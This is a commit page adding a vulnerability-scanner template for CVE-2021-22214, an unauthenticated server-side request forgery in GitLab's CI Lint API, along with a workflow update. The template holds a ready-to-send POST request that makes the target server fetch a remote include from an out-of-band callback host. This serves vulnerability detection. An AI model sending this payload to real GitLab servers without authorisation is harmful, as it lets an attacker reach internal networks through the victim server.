Merge pull request #1714 from skar4444/unauthenticated-CI-lint-API
CVE 2021-22214 - Unauthenticated Gitlab SSRF - CI Lint APIpatch-1
commit
9200ac068a
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-22214
|
||||
|
||||
info:
|
||||
author: Suman_Kar
|
||||
name: Unauthenticated Gitlab SSRF - CI Lint API
|
||||
severity: medium
|
||||
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
|
||||
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
|
||||
- https://docs.gitlab.com/ee/api/lint.html
|
||||
tags: cve,cve2021,gitlab,ssrf,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Referer: {{BaseURL}}
|
||||
content-type: application/json
|
||||
Connection: close
|
||||
|
||||
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
|
@ -10,4 +10,7 @@ workflows:
|
|||
|
||||
- template: exposed-panels/gitlab-detect.yaml
|
||||
subtemplates:
|
||||
- template: misconfiguration/gitlab/
|
||||
- template: misconfiguration/gitlab/
|
||||
- template: vulnerabilities/gitlab/
|
||||
- template: cves/2020/CVE-2020-2096.yaml
|
||||
- template: cves/2021/CVE-2021-22214.yaml
|
Loading…
Reference in New Issue